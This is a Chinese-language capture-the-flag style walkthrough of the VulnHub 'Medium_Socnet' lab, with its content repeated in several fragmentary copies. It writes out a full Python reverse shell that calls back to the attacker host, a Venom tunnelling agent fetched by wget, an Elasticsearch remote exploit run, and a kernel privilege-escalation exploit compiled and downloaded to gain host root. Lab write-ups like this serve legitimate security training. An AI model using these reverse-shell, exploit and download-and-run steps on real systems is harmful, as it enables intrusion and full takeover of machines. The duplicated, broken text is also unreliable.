一、部署环境

二、进行主机发现，arp-scan进行扫描

三、使用nmap扫描发现的靶机IP

1.全端口扫描，看服务

2.查看端口所用服务版本

3.登录ip地址看一下

四、扫目录（dirsearch脚本；和windous御剑类似）

1.安装dirsearch

2.开扫

3.登录网址/admin

（1）开启侦听

（2）进行python反弹shell

（3）id查看当前登录的用户

（4）如何判断是一个docker系统呢

五、跳出docker容器系统隔离环境

1.查看容器ip

六、内网穿透

ok，内网穿透到此结束

七、对内网地址172.17.0.1进行扫描

1.端口服务扫描

2.登录内网172.17.0.1地址

（1）配置代理

（2）访问

八、对内网地址172.17.0.2进行扫描

1.扫端口和服务版本

2.搜索Elasticsearch已知漏洞

3.利用漏洞

（1）复制到当前文件夹下

（2）拿到容器root

（4）对这个容器信息收集

九、利用开放的22端口ssh服务

十、提权

1.查看内核版本

2.查询相关漏洞

（1）复制到本地

（2）查看并编辑

（3）在kali本机找ofs-lib.so

（4）编译37292.c文件

（5）开启http服务

（6）下载编译好的文件

（7）全部移入tmp文件夹下

十一、成功拿到宿主机root权限

一、部署环境
靶机下载地址：

https://download.vulnhub.com/boredhackerblog/medium_socnet.ova

虚拟机网络连接方式采用nat模式即可,靶机和kali位于同一网段下。

二、进行主机发现，arp-scan进行扫描

sudo arp-scan -l

三、使用nmap扫描发现的靶机IP

1.全端口扫描，看服务

sudo nmap -p- 192.168.29.128

发现开放了两个端口22,5000

2.查看端口所用服务版本

sudo nmap -p22,5000 -sV 192.168.29.128

3.登录ip地址看一下
没看出来啥

四、扫目录（dirsearch脚本；和windous御剑类似）

1.安装dirsearch
(1)sudo su 进入超级用户

（2）apt-get update 更新库

（3）apt-get install dirsearch 下载

2.开扫

dirsearch -u http://192.168.29.128

在5000扫出来一个/admin目录

3.登录网址/admin
输入网址加端口进入后台

（1）开启侦听

nc -nvlp 4444

（2）进行python反弹shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.29.129",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

（3）id查看当前登录的用户

注意：老师说这个很诡异，拿到的不是宿主机的最高权限，而是docker容器系统的权限

（4）如何判断是一个docker系统呢
查看两个文件是否存在

两条命令：ls /.dockerenv

cat /proc/1/cgroup

五、跳出docker容器系统隔离环境

1.查看容器ip
ip a与ipconfig命令相似

2.主机发现

1.简易脚本:

for i in $(seq 1 10); do ping -c 1 172.17.0.$i ; done

2.发现其他ip

六、内网穿透
1.下载venom

Releases · Dliv3/Venom · GitHubhttps://github.com/Dliv3/Venom/releases2.启动服务侦听9999端口

3.在服务端开启http服务

先切换到venom v1.1.0 文件夹下，在开启http的80端口服务

python3 -m http.server 80

4.在客户端下载a文件（将venom中的agent x64 linux重命名为了a）

wget http://192.128.29.129/a

（1）下载完成

（2）给予权限

chmod +x a

5.连接服务端

./a -rhost 192.168.29.129 -rport 9999

successfully connects 成功连接

6.服务端查看连接，到节点去，启动一个侦听代理

show

goto 1

socks 1080

7.使用proxychains（命令行代理神器）

使用它是为了让我们nmap等探测工具可以通过代理来扫描到内网主机

（1）修改proxychains的配置文件

将 socks4改为socks5 ，端口改为1080

ok，内网穿透到此结束

七、对内网地址172.17.0.1进行扫描

1.端口服务扫描

proxychains nmap -Pn -sT 172.17.0.1

挂上端口号和-sV参数继续扫描，查看服务版本

proxychains nmap -p22,5000 -Pn -sV -sT 172.17.0.1

通过观察我们可以发现，01这个ip和我们刚开始发现的ip，不管是版本还是服务全都一模一样

2.登录内网172.17.0.1地址

（1）配置代理

（2）访问

可以发现此页面与之前的页面完全一样，可以推断出原ip就是宿主机ip，内网ip是指向docker容器的一个ip

八、对内网地址172.17.0.2进行扫描

1.扫端口和服务版本

扫到一个9200端口之后对这个端口进行服务版本扫描

发现其中存在Elasticsearch。

2.搜索Elasticsearch已知漏洞
kali本身带有一些漏洞库，利用命令搜索

searchsploit Elasticsearch

3.利用漏洞

（1）复制到当前文件夹下

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

（2）拿到容器root

python2 36337.py 172.17.0.2

（4）对这个容器信息收集
发现有个passwords文件，查看一下，发现有账号和加密后的密码

解密后的值为1337hack

九、利用开放的22端口ssh服务

ssh john@192.168.29.128

可以成功登录，但是利用切换到root用户不成功，只是普通用户。

kali之vulhub,medium

一、部署环境 靶机下载地址： https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 虚拟机网络连接方式采用nat模式即可,靶机和kali位于同一网段下。

二、进行主机发现，arp-scan进行扫描 sudo arp-scan -l

三、使用nmap扫描发现的靶机IP

1.全端口扫描，看服务 sudo nmap -p- 192.168.29.128 发现开放了两个端口22,5000

2.查看端口所用服务版本 sudo nmap -p22,5000 -sV 192.168.29.128

3.登录ip地址看一下 没看出来啥

四、扫目录（dirsearch脚本；和windous御剑类似）

1.安装dirsearch (1)sudo su 进入超级用户 （2）apt-get update 更新库 （3）apt-get install dirsearch 下载

2.开扫 dirsearch -u http://192.168.29.128 在5000扫出来一个/admin目录

3.登录网址/admin 输入网址加端口进入后台

（1）开启侦听 nc -nvlp 4444

（2）进行python反弹shell import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.29.129",4444)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

（3）id查看当前登录的用户 注意：老师说这个很诡异，拿到的不是宿主机的最高权限，而是docker容器系统的权限

（4）如何判断是一个docker系统呢 查看两个文件是否存在 两条命令：ls /.dockerenv cat /proc/1/cgroup

五、跳出docker容器系统隔离环境

1.查看容器ip ip a与ipconfig命令相似 2.主机发现 1.简易脚本: for i in $(seq 1 10); do ping -c 1 172.17.0.$i ; done 2.发现其他ip

ok，内网穿透到此结束

七、对内网地址172.17.0.1进行扫描

1.端口服务扫描 proxychains nmap -Pn -sT 172.17.0.1 挂上端口号和-sV参数继续扫描，查看服务版本 proxychains nmap -p22,5000 -Pn -sV -sT 172.17.0.1 通过观察我们可以发现，01这个ip和我们刚开始发现的ip，不管是版本还是服务全都一模一样

2.登录内网172.17.0.1地址

（1）配置代理

（2）访问 可以发现此页面与之前的页面完全一样，可以推断出原ip就是宿主机ip，内网ip是指向docker容器的一个ip

八、对内网地址172.17.0.2进行扫描

1.扫端口和服务版本 扫到一个9200端口之后对这个端口进行服务版本扫描 发现其中存在Elasticsearch。

2.搜索Elasticsearch已知漏洞 kali本身带有一些漏洞库，利用命令搜索 searchsploit Elasticsearch

3.利用漏洞

（1）复制到当前文件夹下 cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

（2）拿到容器root python2 36337.py 172.17.0.2

（4）对这个容器信息收集 发现有个passwords文件，查看一下 ，发现有账号和加密后的密码 解密后的值为1337hack

九、利用开放的22端口ssh服务 ssh john@192.168.29.128 可以成功登录，但是利用切换到root用户不成功，只是普通用户。

十、提权 利用内核版本来进行提权

1.查看内核版本 uname -a

2.查询相关漏洞 利用这条漏洞

（1）复制到本地 cp /usr/share/exploitdb/exploits/linux/local/37292.c .

（2）查看并编辑 由于调用了外部库文件，用gcc生成共享二进制文件so，由于gcc在容器主机没有安装，所有无法正常编译，所以要修改代码并在kali服务端编译好。 将代码调用外部库文件编译二进制文件删除掉

（3）在kali本机找ofs-lib.so 并且拷贝到本地 locate ofs-lib.so

（4）编译37292.c文件 gcc -o exp 37292.c

（5）开启http服务 python3 -m http.server 80

（6）下载编译好的文件 wget http://192.168.29.129/ofs-lib.so wget http://192.168.29.129/exp

（7）全部移入tmp文件夹下 此举是为了保证可以正确执行。 mv * /tmp 给予权限 chmod +x exp id查看一下

十一、成功拿到宿主机root权限

Linux相关栏目本月热门文章

一、部署环境
靶机下载地址：

https://download.vulnhub.com/boredhackerblog/medium_socnet.ova

虚拟机网络连接方式采用nat模式即可,靶机和kali位于同一网段下。

二、进行主机发现，arp-scan进行扫描

sudo arp-scan -l

1.全端口扫描，看服务

sudo nmap -p- 192.168.29.128

发现开放了两个端口22,5000

2.查看端口所用服务版本

sudo nmap -p22,5000 -sV 192.168.29.128

3.登录ip地址看一下
没看出来啥

1.安装dirsearch
(1)sudo su 进入超级用户

（2）apt-get update 更新库

（3）apt-get install dirsearch 下载

2.开扫

dirsearch -u http://192.168.29.128

在5000扫出来一个/admin目录

3.登录网址/admin
输入网址加端口进入后台

（1）开启侦听

nc -nvlp 4444

（2）进行python反弹shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.29.129",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

（3）id查看当前登录的用户

注意：老师说这个很诡异，拿到的不是宿主机的最高权限，而是docker容器系统的权限

（4）如何判断是一个docker系统呢
查看两个文件是否存在

两条命令：ls /.dockerenv

cat /proc/1/cgroup

1.查看容器ip
ip a与ipconfig命令相似

2.主机发现

1.简易脚本:

for i in $(seq 1 10); do ping -c 1 172.17.0.$i ; done

2.发现其他ip

1.端口服务扫描

proxychains nmap -Pn -sT 172.17.0.1

挂上端口号和-sV参数继续扫描，查看服务版本

proxychains nmap -p22,5000 -Pn -sV -sT 172.17.0.1

通过观察我们可以发现，01这个ip和我们刚开始发现的ip，不管是版本还是服务全都一模一样

（2）访问

可以发现此页面与之前的页面完全一样，可以推断出原ip就是宿主机ip，内网ip是指向docker容器的一个ip

1.扫端口和服务版本

扫到一个9200端口之后对这个端口进行服务版本扫描

发现其中存在Elasticsearch。

2.搜索Elasticsearch已知漏洞
kali本身带有一些漏洞库，利用命令搜索

searchsploit Elasticsearch

（1）复制到当前文件夹下

cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

（2）拿到容器root

python2 36337.py 172.17.0.2

（4）对这个容器信息收集
发现有个passwords文件，查看一下，发现有账号和加密后的密码

解密后的值为1337hack

九、利用开放的22端口ssh服务

ssh john@192.168.29.128

可以成功登录，但是利用切换到root用户不成功，只是普通用户。

十、提权
利用内核版本来进行提权

1.查看内核版本

uname -a

2.查询相关漏洞
利用这条漏洞

（1）复制到本地

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

（2）查看并编辑
由于调用了外部库文件，用gcc生成共享二进制文件so，由于gcc在容器主机没有安装，所有无法正常编译，所以要修改代码并在kali服务端编译好。

将代码调用外部库文件编译二进制文件删除掉

（3）在kali本机找ofs-lib.so
并且拷贝到本地

locate ofs-lib.so

（4）编译37292.c文件

gcc -o exp 37292.c

（5）开启http服务

python3 -m http.server 80

（6）下载编译好的文件

wget http://192.168.29.129/ofs-lib.so

wget http://192.168.29.129/exp

（7）全部移入tmp文件夹下
此举是为了保证可以正确执行。

mv * /tmp

给予权限

chmod +x exp

id查看一下